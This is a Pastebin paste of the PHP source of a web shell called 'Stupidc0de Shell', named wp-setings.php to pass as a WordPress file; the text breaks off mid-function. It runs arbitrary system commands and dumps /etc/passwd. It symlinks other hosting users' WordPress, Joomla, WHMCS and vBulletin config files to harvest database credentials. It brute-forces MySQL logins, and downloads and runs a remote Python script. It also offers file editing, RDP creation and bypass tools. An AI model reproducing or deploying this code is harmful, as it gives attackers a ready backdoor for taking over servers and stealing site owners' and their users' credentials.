PalmaSolutions

wp-setings.php

Apr 16th, 2018
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 81.43 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html lang="en" class="no-js">
  3. <HEAD>
  4. <title>-:- Stupidc0de Shell -:-</title>
  5. <script type="text/javascript">
  6.     var message = new Array() // leave this as is
  7.         message[0] = "-:- Stupidc0de Shell -:-";
  8.         message[1] = "-:- Stupidc0de Shell -:-";
  9.         message[2] = "-_";
  10.         message[3] = "-:_";
  11.         message[4] = "-:-_";
  12.         message[5] = "-:- _";
  13.         message[6] = "-:-";
  14.         message[7] = "-:- S_";
  15.         message[8] = "-:- St_";
  16.         message[9] = "-:- Stu_";
  17.         message[10] = "-:- Stup_";
  18.         message[11] = "-:- Stupi_ ";
  19.         message[12] = "-:- Stupid_";
  20.         message[13] = "-:- Stupidc_";
  21.         message[14] = "-:- Stupidc0_";
  22.         message[15] = "-:- Stupidc0d_";
  23.         message[16] = "-:- Stupidc0de_";
  24.         message[17] = "-:- Stupidc0de _";
  25.         message[18] = "-:- Stupidc0de";
  26.         message[19] = "-:- Stupidc0de S_";
  27.         message[20] = "-:- Stupidc0de Sh_";
  28.         message[21] = "-:- Stupidc0de She_";
  29.         message[22] = "-:- Stupidc0de Shel_";
  30.         message[23] = "-:- Stupidc0de Shell_";
  31.         message[24] = "-:- Stupidc0de Shell _";
  32.         message[25] = "-:- Stupidc0de Shell";
  33.         message[26] = "-:- Stupidc0de Shell -_";
  34.         message[27] = "-:- Stupidc0de Shell -:_";
  35.         message[28] = "-:- Stupidc0de Shell -:-_";
  36.         message[29] = "-:- Stupidc0de Shell -:-";
  37.         message[30] = "-:- Stupidc0de Shell -:-_";
  38.         message[31] = "-:- Stupidc0de Shell -:-";
  39.         message[32] = "-:- Stupidc0de Shell -:-_";
  40.     var reps = 2
  41.     var speed =20
  42.     var p=message.length;
  43.     var T="";
  44.     var C=0;
  45.     var mC=0;
  46.     var s=0;
  47.     var sT=null;
  48.     if(reps<1)reps=1;
  49.     function doTheThing(){
  50.     T=message[mC];
  51.     A();}
  52.     function A(){
  53.     s++
  54.     if(s>9){s=1}
  55.     if(s==1){document.title=' '+T+' '}
  56.     if(C<(8*reps)){
  57.     sT=setTimeout("A()",speed);
  58.     C++
  59.     }else{
  60.     C=0;
  61.     s=0;
  62.     mC++
  63.     if(mC>p-1)mC=0;
  64.     sT=null;
  65.     doTheThing();}}
  66.     doTheThing();
  67. </script>
  68. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
  69. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
  70. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
  71. <link rel="shortcut icon" href="https://religioushunter.tk/ESBH.png" type="image/x-icon">
  72. <meta name='author' content='Stupidc0de Family'>
  73. <meta charset="UTF-8">
  74. <style type="text/css">
  75.         body {
  76.             background: #000000;
  77.             color: springgreen;
  78.             font-family :Homenaje;
  79.         }
  80.  
  81.         #bawah{
  82.             margin-bottom: 50px;
  83.         }
  84.  
  85.         #content .first {
  86.             background-color: black;
  87.         }
  88.  
  89.         a {
  90.             color: white;
  91.             text-decoration: none;
  92.         }
  93.  
  94.         input,select,textarea{
  95.             border: 1px #000000 solid;
  96.             -moz-border-radius: 5px;
  97.             -webkit-border-radius:5px;
  98.             border-radius:5px;
  99.         }
  100.  
  101.         #menu {
  102.             background:#000000;
  103.             margin:8px 2px 4px 2px;
  104.             font-family:Fredericka the Great;
  105.             font-size:14px;
  106.             color:silver;
  107.         }
  108.  
  109.         #menu a {
  110.             padding:3px 6px;
  111.             margin:1;
  112.             background:#2d2b2b;
  113.             text-decoration:none;
  114.             letter-spacing:2px;
  115.             -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  116.         }
  117.  
  118.         #menu a:hover {
  119.             background:black;
  120.             border-bottom:1px solid #ffffff;
  121.             border-top:1px solid #ffffff;
  122.         }
  123.  
  124.         .tombolupil {
  125.             background:black;
  126.             color:white;
  127.             margin:0 10px;
  128.             font-family:Homenaje;
  129.             font-size:16px;
  130.             border:2px solid crimson;
  131.         }
  132.  
  133.         .tombolupil:hover {
  134.             background:crimson;
  135.             color:white;
  136.             margin:0 10px;
  137.             font-family:Homenaje;
  138.             font-size:16px;
  139.             border:2px solid crimson;
  140.         }
  141.  
  142.         .bordergaya {
  143.             background:black;
  144.             color:white;
  145.             margin:0 10px;
  146.             font-family:Homenaje;
  147.             font-size:16px;
  148.             border:2px solid #2d2b2b;
  149.         }
  150.  
  151.         .bordergaya:hover {
  152.             background:#2d2b2b;
  153.             color:white;
  154.             margin:0 10px;
  155.             font-family:Homenaje;
  156.             font-size:16px;
  157.             border:2px solid crimson;
  158.         }
  159.  
  160.         .justborder {
  161.             background:black;
  162.             color:white;
  163.             margin:0 10px;
  164.             font-family:Homenaje;
  165.             font-size:16px;
  166.             border:2px solid #2d2b2b;
  167.         }
  168.  
  169.         .rapihbanget {
  170.             text-align: left;
  171.             font-size: 16px;
  172.             color: springgreen;
  173.             font-family: Homenaje;
  174.             margin-left: 38%;
  175.         }
  176.  
  177.         .kecew {
  178.             text-align: left;
  179.             font-size: 15px;
  180.             color: white;
  181.             font-family: Homenaje;
  182.         }
  183.  
  184.         /* STYLE UPIL BIAR KEKINIAN */
  185.  
  186.         .js .inputfile{
  187.             width: 0.1px;
  188.             height: 0.1px;
  189.             opacity: 0;
  190.             overflow: hidden;
  191.             position: absolute;
  192.             z-index: -1;
  193.         }
  194.  
  195.         .inputfile + label {
  196.             max-width: 80%;
  197.             font-size: 1.25rem;
  198.             /* 20px */
  199.             font-weight: 700;
  200.             text-overflow: ellipsis;
  201.             white-space: nowrap;
  202.             cursor: pointer;
  203.             display: inline-block;
  204.             overflow: hidden;
  205.             padding: 0.625rem 1.25rem;
  206.             /* 10px 20px */
  207.         }
  208.  
  209.         .no-js .inputfile + label {
  210.             display: none;
  211.         }
  212.  
  213.         .inputfile:focus + label,
  214.         .inputfile.has-focus + label {
  215.             outline: 1px dotted #000;
  216.             outline: -webkit-focus-ring-color auto 5px;
  217.         }
  218.  
  219.         .inputfile + label * {
  220.             /* pointer-events: none; */
  221.             /* in case of FastClick lib use */
  222.         }
  223.  
  224.         .inputfile + label svg {
  225.             width: 1em;
  226.             height: 1em;
  227.             vertical-align: middle;
  228.             fill: currentColor;
  229.             margin-top: -0.25em;
  230.             /* 4px */
  231.             margin-right: 0.25em;
  232.             /* 4px */
  233.         }
  234.  
  235.         .inputfile-4 + label {
  236.             color: white;
  237.             font-family:Homenaje;
  238.             font-size:15px;
  239.         }
  240.  
  241.         .inputfile-4:focus + label,
  242.         .inputfile-4.has-focus + label,
  243.         .inputfile-4 + label:hover {
  244.             color: crimson;
  245.         }
  246.  
  247.         .inputfile-4 + label figure {
  248.             width: 50px;
  249.             height: 50px;
  250.             border-radius: 25%;
  251.             background-color: crimson;
  252.             display: block;
  253.             padding: 10px;
  254.             margin: 0 auto 10px;
  255.         }
  256.  
  257.         .inputfile-4:focus + label figure,
  258.         .inputfile-4.has-focus + label figure,
  259.         .inputfile-4 + label:hover figure {
  260.             background-color: white;
  261.         }
  262.  
  263.         .inputfile-4 + label svg {
  264.             width: 100%;
  265.             height: 100%;
  266.             fill: black;
  267.         }
  268.  
  269. </style>
  270. </HEAD>
  271. <BODY>
  272. <center>
  273. <?php  
  274. set_time_limit(0);
  275. error_reporting(0);
  276.  if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } $self=$_SERVER['PHP_SELF']; $srvr_sof=$_SERVER['SERVER_SOFTWARE']; $your_ip=$_SERVER['REMOTE_ADDR']; $srvr_ip=$_SERVER['SERVER_ADDR']; $admin=$_SERVER['SERVER_ADMIN']; function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function getfile($urlfile, $content) { $fp = fopen($content, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $urlfile); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw==  "; echo '<script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>'; echo"<br/>
  277. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
  278. *-~'`^'*u_                                _u*'^`'~-*,
  279. p!^       /  jPw                            w9j \        ^!p
  280. w^.._      /      '\_                      _/'     \        _.^w
  281. *_   /          \_       _    _      _/         \     _*
  282.  q /           / \q   ( '---' )   p/ \          \   p
  283. jj5****._    /    ^\_) o  o (_/^    \    _.****6jj
  284. *_ /      '==) ;; (=='      \ _*
  285. `/.w***,   /(    )\   ,***w.\'
  286. ^      ^c/ )    ( \c^      ^
  287. 'V')_)(_('V'</pre>"; echo "<center><br><font color='Crimson' size='6px' face='Fredericka the Great'>&hearts; ErrOr SquaD &hearts;</font></center>"; echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] Optimus [+]</font></center><br/>"; echo"
  288. <font size='4' color='Teal' face='Jolly Lodger'>
  289. <center>".php_uname()."<br>
  290. ".$software = getenv("SERVER_SOFTWARE"); echo"<p>"; echo"
  291. <font size='3.5' color='white'><p>
  292.             Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
  293.  
  294.             </font>
  295. </font>
  296.             </div>
  297.             </td>
  298.         </tr>
  299.     </tbody>
  300. </table></div>
  301. </font>"; $disablefunctions = @ini_get("disable_functions"); $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled  For This Server! ~_^</font>"; echo '<br/><font size="4" style="font-family:Jolly Lodger; color:teal;">
  302. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>'; echo '<br/><font size="4" style="font-family:Jolly Lodger;">
  303. <tr><td> Your Path Location :'; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</font>'; $putraganteng=getcwd(); $putraganteng=$path; ?>
  304.  
  305. <?php  echo"<center>
  306.             <table>
  307.                 <tr>
  308.                     <td>
  309.                       <form style='float:right;' method='POST'><input name='path' value=".$putraganteng." type=hidden>
  310.                       <input class=bordergaya type='submit' value='Create New File' >
  311.                       <input class=bordergaya size='40' name='new_file' /></form>
  312.                     </td>
  313.                     <td>
  314.                       <form  style='float:left;' method='POST'><input name='path' value=".$putraganteng." type=hidden>
  315.                       <input class=bordergaya size='40' name='new_dir'>
  316.                       <input class=bordergaya type='submit' value='Create New Folder' /></form>
  317.                     </td>
  318.                 </tr>
  319.             </table>
  320.           </center>"; function mk_file_ui(){ chdir($_POST['path']); echo "<font color='springgreen'><form method='POST'>
  321.               <input type='hidden' name='path' value=".getcwd().">
  322.               <br/>New File Name : <input class=bordergaya size='40' name='new_f_name' value=".$_POST['new_file']."></font><br /><br /><center>
  323.               <textarea spellcheck='false' cols='80' rows='15' class=bordergaya name='n_file_content'></textarea></center><br>
  324.               <input class='bordergaya' type='submit' value='  Save  ' /></form></center></div>"; die(); } function mk_file_bg(){ chdir($_POST['path']); $c_path=$_POST['path']; $c_file=$_POST['new_f_name']; $c_file_contents=$_POST['n_file_content']; $handle=fopen($c_file, "w"); if(!$handle){ echo '<script>alert("Failed :(");</script>'; }else{ fwrite($handle,$c_file_contents); echo '<script>alert("File Saved!!");</script>'; } fclose($handle); } function create_dir(){ chdir($_POST['path']); $new_dir=$_POST['new_dir']; if(is_writable($_POST['path'])){ mkdir($new_dir); echo '<script>alert("Creating Folder Success!!");</script>'; }else{ echo '<script>alert("Creating Folder Failed!!");</script>'; } } ?>
  325.  
  326. <!-- menu utama -->
  327. <br><center><div id="menu">
  328. [<a href="?">Home</a>] <font color=orange>=</font>
  329. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
  330. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
  331. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
  332. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
  333. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
  334. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
  335. <br><br>
  336. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
  337. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
  338. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
  339. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
  340. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper Tools</a>] <font color=orange>=</font>
  341. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
  342. </div></center>
  343. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
  344.  
  345. <?php  if(isset($_GET['filesrc'])){ echo "<br /><tr><td>You Are Looking : "; echo $_GET['filesrc']; echo '</tr></td></table>'; echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>'); die(); } else if(isset($_POST['path']) && isset($_POST['new_file'])){ chdir($_POST['path']); mk_file_ui(); }else if(isset($_POST['path']) && isset($_POST['new_f_name']) && isset($_POST['n_file_content'])){ mk_file_bg(); }else if(isset($_POST['path']) && isset($_POST['new_dir'])){ chdir($_POST['path']); create_dir(); } elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<script>alert("Change Permission Done!");</script>'; }else{ echo '<script>alert("Change Permission fail!");</script>'; } } echo '<form method="POST">
  346.                 Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  347.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
  348.                 <input type="hidden" name="opt" value="chmod">
  349.                 <input class="bordergaya" type="submit" value="Go" />
  350.                 </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<script>alert("Change Name done!");</script>'; }else{ echo '<script>alert("Change Name fail!");</script>'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST">
  351.                 New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  352.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
  353.                 <input type="hidden" name="opt" value="rename">
  354.                 <input class="bordergaya" type="submit" value="Go" />
  355.                 </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<script>alert("Edit File done !");</script>'; }else{ echo '<script>alert("Edit File fail!");</script>'; } fclose($fp); } echo '<form method="POST">
  356.                 <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  357.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
  358.                 <input type="hidden" name="opt" value="edit">
  359.                 <input class="bordergaya" type="submit" value="Go" />
  360.                 </form>'; } echo '</center>'; die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0); echo "
  361. <form method='POST'>
  362. </head>
  363. <style>
  364. textarea {
  365. resize:none;
  366. color: #000000 ;
  367. background-color:#000000;
  368. font-size:8pt; color:#ffffff;
  369. border:1px solid white ;
  370. border-left: 4px solid white ;
  371. width:543px;
  372. height:400px;
  373. }
  374. input {
  375. color: #000000;
  376. border:1px dotted white;
  377. }
  378. </style>"; echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Stupidc0de-Conf', 0755);@chdir('Stupidc0de-Conf'); $htaccess="
  379. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  380. Options Indexes FollowSymLinks
  381. ForceType text/plain
  382. AddType text/plain .php
  383. AddType text/plain .html
  384. AddType text/html .shtml
  385. AddType txt .php
  386. AddHandler server-parsed .php
  387. AddHandler txt .php
  388. AddHandler txt .html
  389. AddHandler txt .shtml
  390. Options All
  391. Options All"; file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"]; $passwd=explode("\n",$passwd); echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>"; foreach($passwd as $pwd){ $pawd=explode(":",$pwd);$user =$pawd[0]; @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt'); @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt'); @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt'); @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt'); @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt'); @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt'); @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt'); @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt'); @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt'); @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt'); @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt'); @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt'); @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt'); @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt'); @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt'); @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt'); @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt'); @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt'); @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt'); @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt'); @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt'); @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt'); @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt'); @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt'); @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt'); @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt'); @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt'); @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt'); @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt'); @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');} echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Completed Boss >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';} die(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')) { ?>
  392.                         <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
  393.             <?php  @set_time_limit(0); @error_reporting(0); if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) { if($_POST['type'] == 'passwd'){ $e = explode("\n",$_POST['usernames']); foreach($e as $value){ $k = explode(":",$value); $username .= $k['0']." "; } }elseif($_POST['type'] == 'simple'){ $username = str_replace("\n",' ',$_POST['usernames']); } $a1 = explode(" ",$username); $a2 = explode("\n",$_POST['passwords']); $id2 = count($a2); $ok = 0; foreach($a1 as $user ) { if($user !== '') { $user=trim($user); for($i=0;$i<=$id2;$i++) { $pass = trim($a2[$i]); if(@mysql_connect('localhost',$user,$pass)) { echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />"; $ok++; } } } } echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>"; echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>"; exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['HTTP_HOST']; $dir=$_SERVER['PHP_SELF']; mkdir('config',0755); $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98"); $file = fopen("cp.py","w+"); $write = fwrite ($file ,$cp); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center>
  394.             <textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea>
  395.             </center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); 